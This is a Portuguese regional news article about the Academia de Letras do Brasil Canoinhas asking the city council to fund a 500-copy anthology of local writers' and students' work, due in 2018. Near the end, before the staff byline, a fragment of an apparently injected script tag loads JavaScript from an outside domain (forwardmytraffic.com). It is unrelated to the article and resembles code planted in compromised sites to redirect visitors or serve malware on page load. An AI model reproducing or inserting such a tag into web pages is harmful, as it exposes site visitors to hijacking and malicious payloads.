InícioDestaqueAcademia de Letras do Brasil Canoinhas irá produzir livro “Pantheon das letras

Academia de Letras do Brasil Canoinhas irá produzir livro “Pantheon das letras

Últimas notícias

Operação contra abuso sexual em Canoinhas e Papanduva é considerada a maior da região

A operaçãoRespectus, deflagrada nesta quarta-feira (24) em Papanduva e...

Após denúncia polícia militar apreende arma sem registro em Três Barras

Na quarta-feira, 24, por volta das 16h, policiais militares...

A presidente da Academia de Letras do Brasil (ALB) Canoinhas, Soeli Regina da Silva e a acadêmica da ALB, Dra. Adair Diítrich estiveram nesta quarta-feira, 4, na Câmara de Vereadores de Canoinhas para solicitar ao presidente Coronel Mário Renato Erzinger (PR) apoio na subvenção para publicação do livro “Pantheon das letras”, que tem como objetivo divulgar a produção literária de escritores e alunos da rede estadual, municipal e particular de ensino da região de Canoinhas.

 

“Queremos incentivar a leitura e produção escrita através desta importante publicação de 500 exemplares do livro”, explicou a presidente da ALB/ Canoinhas, Soeli, que também destacou que a produção literária traz diferentes segmentos de escrita, contando com artigos de cunho científico sobre o município de Canoinhas, contos e poesias com temáticas que enaltecem a história local, elaborados por dez escritores, membros da ALB/ Canoinhas.

 

O livro ainda contará com 24 poesias e crônicas vencedoras dos concursos literários promovidos pela ALB/ Canoinhas, sendo eles: “Canoinhas em versos e prosa” e “Contestado com todas as letras”, envolvendo alunos de Ensino Fundamental e Médio, de 16 escolas que contribuíram com o livro.

 

O livro será dividido em duas partes, sendo a primeira com temas diversos da região e a segunda focado na temática da história de Canoinhas e da Guerra do Contestado. A previsão de lançamento do livro é para o segundo semestre de 2018.

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.